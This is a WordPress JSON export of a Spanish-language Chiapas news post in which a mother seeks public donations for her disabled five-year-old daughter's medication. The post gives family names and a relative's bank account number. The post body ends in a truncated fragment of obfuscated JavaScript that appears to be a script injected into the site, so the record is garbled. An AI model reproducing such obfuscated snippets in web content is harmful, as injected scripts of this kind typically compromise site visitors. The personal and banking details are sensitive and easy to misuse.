{"id":1119,"date":"2022-04-06T03:59:55","date_gmt":"2022-04-06T03:59:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1119"},"modified":"2022-04-06T03:59:56","modified_gmt":"2022-04-06T03:59:56","slug":"piden-ayuda-para-menor-con-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1119","title":{"rendered":"Piden ayuda para menor con discapacidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-05-at-4.42.29-PM-768x1024.jpeg\" alt=\"\" class=\"wp-image-1120\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-05-at-4.42.29-PM-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-05-at-4.42.29-PM-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-05-at-4.42.29-PM.jpeg 780w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Josefa P\u00e9rez P\u00e9rez pidi\u00f3 la ayuda econ\u00f3mica de la ciudadan\u00eda para poder comprar los medicamentos de su peque\u00f1a hija de 5 a\u00f1os, quien desde hace 3 a\u00f1os padece una discapacidad por secuelas neurol\u00f3gicas secundarias de una Encefalopat\u00eda con hip\u00f3xico isqu\u00e9mica aguda.<\/p>\n\n\n\n<p>En conferencia de prensa, dijo que la ni\u00f1a no puede caminar, no puede comer bien y necesita varios medicamentos que no pueden ser cubiertos porque son de bajos recursos econ\u00f3micos, por lo que solicita ayuda a trav\u00e9s de los medios de comunicaci\u00f3n para pedir ayuda con medicamentos, pa\u00f1ales o con lo que la gente les guste donar.<\/p>\n\n\n\n<p>\u201cHa tenido cuatro paros respiratorios, le afect\u00f3 el cerebro, perdi\u00f3 la marcha, el habla, le tengo que dar su comidita, va ser tres a\u00f1os, se enferm\u00f3 de dos a\u00f1os y 8 meses, no tengo ning\u00fan seguro social, no la ha atendido ninguna instituci\u00f3n, el sueldo que gana mi esposo se va en todo el medicamento, tengo otro beb\u00e9 de dos a\u00f1os, espero que se toquen el coraz\u00f3n y nos apoyen\u201d.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que ya no pueden cubrir los gastos que oscilan entre los 2 mil 600 semanales, ya que la atenci\u00f3n que recibe es de forma particular y es probable que no se recupere en su totalidad, pero puede sobrellevar su enfermedad, \u201cyo no puedo trabajar por el cuidado de ella, siento que estoy atrapada, quisiera moverme, pero no se me dan las cosas\u201d.<\/p>\n\n\n\n<p>Para los interesados en apoyar pueden depositar al n\u00famero de cuenta Bancomer 153 543 64 83 de a nombre de Juana Celia P\u00e9rez P\u00e9rez que es su hermana, y la ayuda es para medicamentos que previenen las convulsiones para la ni\u00f1a, \u201cno tiene silla de ruedas, cuesta un poco llevarla, ya acudimos al DIF Municipal y la respuesta es que nos dicen que no tienen recursos, que es por el cambio de alcalde, al DIF Estatal todav\u00eda no me he acercado\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Josefa P\u00e9rez P\u00e9rez pidi\u00f3 la ayuda econ\u00f3mica de la ciudadan\u00eda para poder comprar los medicamentos de su peque\u00f1a hija de 5 a\u00f1os, quien desde hace 3 a\u00f1os padece una discapacidad por secuelas neurol\u00f3gicas secundarias de una Encefalopat\u00eda con hip\u00f3xico isqu\u00e9mica aguda. En conferencia de prensa, dijo que la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1120,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1119","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1119"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1119\/revisions"}],"predecessor-version":[{"id":1121,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1119\/revisions\/1121"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1120"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}